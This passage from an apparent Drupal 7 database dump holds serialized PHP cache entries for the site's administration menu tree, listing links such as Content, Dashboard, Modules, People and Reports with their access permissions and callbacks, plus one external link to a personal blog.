settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:33;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"33\";s:4:\"plid\";s:2:\"11\";s:9:\"link_path\";s:25:\"admin/dashboard/configure\";s:11:\"router_path\";s:25:\"admin/dashboard/configure\";s:10:\"link_title\";s:36:\"Configure available dashboard blocks\";s:7:\"options\";s:103:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Configure which blocks can be shown on the dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:2:\"33\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:22:\"dashboard_admin_blocks\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:25:\"admin/dashboard/configure\";s:5:\"title\";s:36:\"Configure available dashboard blocks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"4\";s:11:\"description\";s:53:\"Configure which blocks can be shown on the dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:37;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"37\";s:4:\"plid\";s:2:\"11\";s:9:\"link_path\";s:25:\"admin/dashboard/customize\";s:11:\"router_path\";s:25:\"admin/dashboard/customize\";s:10:\"link_title\";s:19:\"Customize dashboard\";s:7:\"options\";s:75:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:25:\"Customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:2:\"37\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;b:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:25:\"admin/dashboard/customize\";s:5:\"title\";s:19:\"Customize dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"4\";s:11:\"description\";s:25:\"Customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:346;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"346\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:26:\"http://www.ollital.de/blog\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:58:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"346\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1445691048,1),('links:management:tree-data:en:a9eea78b0aeaddd605894be48877502635d2ae1b2a8a8d29cc1b7d377b699477','a:2:{s:4:\"tree\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and 